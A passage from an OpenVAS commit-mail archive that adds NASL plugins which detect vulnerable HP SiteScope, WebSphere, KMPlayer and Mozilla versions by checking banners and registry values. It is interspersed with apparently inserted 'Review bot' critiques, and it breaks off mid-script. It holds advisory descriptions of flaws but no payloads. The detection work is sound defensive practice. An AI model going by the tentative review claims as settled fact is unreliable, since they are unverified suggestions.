[Openvas-commits] r11594 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Fri Sep 9 17:36:57 CEST 2011


Author: veerendragg
Date: 2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)
New Revision: 11594

Added:
   trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
   trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl
   trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl
Log:
Added new plugins. Updated reference and added security_note.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/ChangeLog	2011-09-09 15:36:48 UTC (rev 11594)
@@ -1,3 +1,29 @@
+2011-09-09  Veerendra G.G <veerendragg at secpod.com>
+
+	* scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl,
+	scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl,
+	scripts/gb_kmplayer_kpl_file_bof_vuln.nasl,
+	scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl,
+	scripts/gb_search_network_xss_vuln.nasl,
+	scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl,
+	scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl,
+	scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl,
+	scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl,
+	scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl,
+	scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl,
+	scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl,
+	scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl,
+	scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl,
+	scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_thunderbird_detect_win.nasl,
+	scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl:
+	Updated reference and Added security_note. 
+
 2011-09-09  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_tomcat_48667.nasl,

Modified: trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -31,8 +31,8 @@
   script_cve_id("CVE-2011-0245", "CVE-2011-0246", "CVE-2011-0247",
                 "CVE-2011-0248", "CVE-2011-0249", "CVE-2011-0250",
                 "CVE-2011-0251", "CVE-2011-0252", "CVE-2011-0256",
-                "CVE-2011-0257");
-  script_bugtraq_id(49028, 49029, 49030, 49031, 49144);
+                "CVE-2011-0257", "CVE-2011-0258");
+  script_bugtraq_id(49028, 49029, 49030, 49031, 49144, 49396);
   script_tag(name:"cvss_base", value:"9.3");
   script_tag(name:"risk_factor", value:"Critical");
   script_name("Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows)");
@@ -51,6 +51,7 @@
     of 'QTL' files.
   - an integer overflow existed in the handling of track run atoms in
     QuickTime movie files.
+  - improper bounds checking when handling 'mp4v' codec information.
 
   Impact:
   Successful exploitation could allow attackers to execute arbitrary code in

Added: trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,116 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_hp_sitescope_xss_n_session_fixation_vuln.nasl 16416 2011-09-07 10:35:01Z sep $
+#
+# HP SiteScope Cross-Site Scripting and Session Fixation Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801976);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2400", "CVE-2011-2401");
+  script_bugtraq_id(48916, 48913);
+  script_tag(name:"cvss_base", value:"9.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("HP SiteScope Cross-Site Scripting and Session Fixation Vulnerabilities");
+  desc = "
+  Overview: This host is running HP SiteScope and is prone to cross-site
+  scripting and session fixation vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Certain unspecified input is not properly sanitised before being returned
+    to the user. This can be exploited to execute arbitrary HTML and script
+    code in a user's browser session in context of an affected site.
+  - An error in the handling of sessions can be exploited to hijack another
+    user's session by tricking the user into logging in after following a
+    specially crafted link.
+
+  Impact:
+  Successful exploitation could allow execution of scripts or actions written
+  by an attacker. In addition, an attacker may conduct session fixation attacks
+  to hijack the target user's session.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  HP SiteScope version 9.x, 10.x, and 11.x
+
+  Fix: Apply the patch from below link,
+  For updates refer, http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02940969
+
+  *****
+  NOTE : Ignore this warning if above mentioned patch is applied already.
+  *****
+
+  References:
+  http://osvdb.org/74113
+  http://secunia.com/advisories/45440
+  http://securitytracker.com/id?1025856
+  http://xforce.iss.net/xforce/xfdb/68867
+  http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02940969 ";
+
+  script_description(desc);
+  script_summary("Determine if installed SiteScope version is vulnerable");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("find_service.nes", "http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Get the server banner
+banner = get_http_banner(port:port);
+if(!banner){
+  exit(0);
+}
+
+## Confirm the server
+if("Server: SiteScope/" >!< banner){
+  exit(0);
+}
+
+## Match the version
+version = eregmatch(pattern:"Server: SiteScope/([^ ]+)", string:banner);
+if(isnull(version[1])){
+  exit(0);
+}
+
+## Check for the version 9.x, 10.x, and 11.x
+if(version_is_less_equal(version:version[1], test_version:"9.54") ||
+   version_in_range(version:version[1], test_version:"11.0", test_version2:"11.10") ||
+   version_in_range(version:version[1], test_version:"10.0", test_version2:"10.14")) {
+  security_warning(port:port);
+}
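Review bot: The banner capture `version = eregmatch(pattern:"Server: SiteScope/([^ ]+)", string:banner);` stops only at a space, so if the Server header line still carries its CRLF ending the captured string ends in a carriage return and the three version_* comparisons below may not match as intended; restricting the class to version characters, `version = eregmatch(pattern:"Server: SiteScope/([0-9.]+)", string:banner);`, avoids that. Separately, the script reports with `security_warning(port:port);` although risk_factor is set to Critical with cvss_base 9.0; the other Critical-rated scripts in this commit report with security_hole, so either the report level or the rating should be aligned.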

Added: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 17027 2011-09-08 13:13:13Z sep $
+#
+# IBM WebSphere Application Server Administration Directory Traversal Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801977);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-1359");
+  script_bugtraq_id(49362);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("IBM WebSphere Application Server Administration Directory Traversal Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to directory traversal vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in administration console which fails to
+  handle certain requests. This allows remote attackers to read arbitrary
+  files via a '../' (dot dot) in the URI.
+
+  Impact:
+  Successful exploitation will allow attackers to read arbitrary files on the
+  affected application and obtain sensitive information that may lead to
+  further attacks.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server versions 6.1 before 6.1.0.41,
+  7.0 before 7.0.0.19 and 8.0 before 8.0.0.1
+
+  Fix: Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or
+  8.0.0.1
+  For updates refer, http://www-01.ibm.com/support/docview.wss?uid=swg24028875
+
+  References:
+  http://osvdb.org/74817
+  http://secunia.com/advisories/45749
+  http://xforce.iss.net/xforce/xfdb/69473
+  http://www-01.ibm.com/support/docview.wss?uid=swg21509257 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_is_equal(version: vers, test_version:"8.0.0.0") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.40") ||
+   version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.18")){
+  security_warning(port:port);
+}
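Review bot: The 8.0 branch is tested with `version_is_equal(version: vers, test_version:"8.0.0.0")` while the description says "8.0 before 8.0.0.1"; if the detect script can report the version as `8.0` or `8.0.0`, that exact match misses it, and `version_in_range(version: vers, test_version: "8.0", test_version2: "8.0.0.0")` would cover the branch the same way the 6.1 and 7.0 ranges do — worth confirming what gb_ibm_websphere_detect.nasl writes to the KB. As a point of style, `script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");` uses an upper-case (C) where every other new script in this commit writes (c).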


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_kmplayer_kpl_file_bof_vuln.nasl 16971 2011-09-08 15:14:14Z sep $
+#
+# KMPlayer '.kpl' File 'Title' Field Remote Buffer Overflow Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802154);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2594");
+  script_bugtraq_id(49342);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("KMPlayer '.kpl' File 'Title' Field Remote Buffer Overflow Vulnerability");
+  desc = "
+  Overview: This host is installed with KMPlayer and is prone to buffer
+  overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper bounds checking when parsing the 'Title'
+  entry within play list files.
+
+  Impact:
+  Successful exploitation allows attackers to overflow a buffer and execute
+  arbitrary code on the system or cause the application to crash.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  KMPlayer versions 3.0.0.1441 and prior.
+
+  Fix: No solution or patch is available as on 8th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.kmplayer.com/
+
+  References:
+  http://secunia.com/advisories/45264
+  http://xforce.iss.net/xforce/xfdb/69451 ";
+
+  script_description(desc);
+  script_summary("Check for the version of KMPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_keys("SMB/WindowsVersion");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Confirm Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+if(!registry_key_exists(key:"SOFTWARE\KMPlayer")){
+  exit(0);
+}
+
+## Confirm Application
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\The KMPlayer";
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+kmName = registry_get_sz(key:key, item:"DisplayName");
+if("KMPlayer" >< kmName)
+{
+  ## Get the path of uninstallstring
+  kmPath = registry_get_sz(key:key + item, item:"UninstallString");
+  if(kmPath)
+  {
+    kmPath = ereg_replace(pattern:'\"(.*)\"', replace:"\1", string:kmPath);
+    kmPath = ereg_replace(pattern:'uninstall.exe', replace:"KMPlayer.exe", string:kmPath);
+
+    ## Get Version from KMPlayer.exe
+    kmVer = fetch_file_version(sysPath:kmPath);
+    if(! kmVer){
+      exit(0);
+    }
+
+    ## Check for KMPlayer versions 3.0.0.1441 and prior.
+    if(version_is_less_equal(version:kmVer, test_version:"3.0.0.1441")){
+      security_hole(0);
+    }
+  }
+}
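Review bot: `kmPath = registry_get_sz(key:key + item, item:"UninstallString");` concatenates a variable `item` that is never assigned anywhere in this script, which looks like a leftover from a loop that was removed; the key is complete on its own, so the line should read `kmPath = registry_get_sz(key:key, item:"UninstallString");`. The replacement `ereg_replace(pattern:'uninstall.exe', replace:"KMPlayer.exe", string:kmPath);` is also case-sensitive, so if the registry stores the uninstaller as `Uninstall.exe` the path is left pointing at the uninstaller and fetch_file_version reads the wrong binary — worth confirming against a real install, or making the pattern case-insensitive with the icase parameter if the project's ereg_replace supports it.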

Added: trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl 16832 2011-09-05 19:15:33Z sep $
+#
+# Mozilla Firefox Untrusted Search Path Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802149);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2980");
+  script_bugtraq_id(49217);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Firefox Untrusted Search Path Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox and is prone to
+  untrusted search path vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'ThinkPadSensor::Startup' allows local
+  users to gain privileges by leveraging write access in an unspecified
+  directory to place a Trojan horse DLL that is loaded into the running
+  Firefox process.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Mozilla Firefox version before 3.6.20
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  References:
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
+     exit(0);
+  }
+}
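Review bot: The Vulnerability Insight text describes a local privilege escalation ("allows local users to gain privileges by leveraging write access in an unspecified directory"), which sits uneasily with `script_tag(name:"cvss_base", value:"10.0");` and a Critical risk_factor; a network-exploitable 10.0 score for a local DLL search-path issue looks like it should be re-checked against MFSA 2011-30 before this ships. The product name in the Overview sentence is also mis-cased and should read `Overview: The host is installed with Mozilla Firefox and is prone to`.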

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,116 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win.nasl 16832 2011-09-05 19:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802150);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2981", "CVE-2011-2984", "CVE-2011-2378");
+  script_bugtraq_id(49218, 49219, 49214);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/seamonkey/thunderbird
+  and is prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error in the 'event-management' implementation, which fails to select
+    the context for script to run in.
+  - Improper handling of the dropping of a tab element.
+  - An error in 'appendChild()' function, which fails to handle DOM objects.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application. Failed exploit attempts will likely
+  result in denial-of-service conditions.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version before 3.6.20
+  Thunderbird version 3.0 through 3.1.11
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  References:
+  http://secunia.com/advisories/45666/
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/SeaMonkey/Thunderbird");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                      "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}
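Review bot: The Affected Software/OS list names Thunderbird 3.0 through 3.1.11 and the Thunderbird branch at the bottom reports it, but the Fix section only gives upgrade instructions for Firefox and SeaMonkey; the sibling gb_mozilla_prdts_mult_vuln_sep11_win01.nasl in this commit adds `Upgrade to Thunderbird version to 3.1.12 or later` followed by `http://www.mozilla.org/en-US/thunderbird/`, and the same two lines belong in this description too. As a point of style, the Thunderbird check tests `if(tbVer != NULL)` while the Firefox and SeaMonkey checks use the truthiness form `if(ffVer)` / `if(seaVer)`; one form for all three branches reads more consistently.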

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,122 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win01.nasl 16832 2011-09-06 11:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802151);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2982", "CVE-2011-2983");
+  script_bugtraq_id(49216, 49223);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to multiple unspecified vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - Unspecified errors in the browser engine in mozilla products.
+  - Improperly handling of the 'RegExp.input' property, which allows remote
+    attackers to bypass the same origin policy and read data from a different
+    domain via a crafted web site.
+
+  Impact:
+  Successful exploitation will allow attackers to execute arbitrary code in
+  the context of the user running an affected application. Failed exploit
+  attempts will result in a denial-of-service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Mozilla Firefox version before 3.6.20
+  SeaMonkey version 1.x and 2.0 through 2.2
+  Thunderbird version 2.x and 3.0 through 3.1.11
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 3.1.12 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  http://secunia.com/advisories/45666/
+  http://support.avaya.com/css/P8/documents/100146973
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
